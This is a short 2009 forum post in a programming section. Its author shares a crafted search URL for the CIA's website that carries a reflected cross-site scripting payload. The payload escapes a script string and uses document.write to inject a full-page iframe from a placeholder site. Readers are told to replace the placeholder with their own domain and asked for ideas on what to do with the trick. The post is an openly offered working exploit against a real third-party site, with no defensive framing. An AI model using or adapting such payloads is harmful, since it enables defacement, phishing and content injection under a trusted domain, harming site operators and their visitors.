CIA's website linking with XSS trick

Discussion in 'Programming' started by bunnny, Mar 24, 2009.

  1. #1
    https://www.cia.gov/search?NS-search-page=results&NS-collection=Everything&NS-query=%27}a=/%253Ciframe%20src=http:%252F%252FYOURSITE.COM%20width=100%2525%20height=2000%20frameborder=0%20scroll=no%3E%253C%252F%253E%253C/;document.write(unescape(a.source));{//]https://www.cia.gov/search?NS-search-page=r...(a.source));{//
    Code (markup):
    Here is a link to get a XSS listing on the CIA's website.

    Remember edit the link first to add a site replacing YOURSITE.COM with something.com

    Let me know if you think of something to do with this trick :rolleyes:

    Oh, and see you all in Guantanamo Bay...:p
     
    bunnny, Mar 24, 2009 IP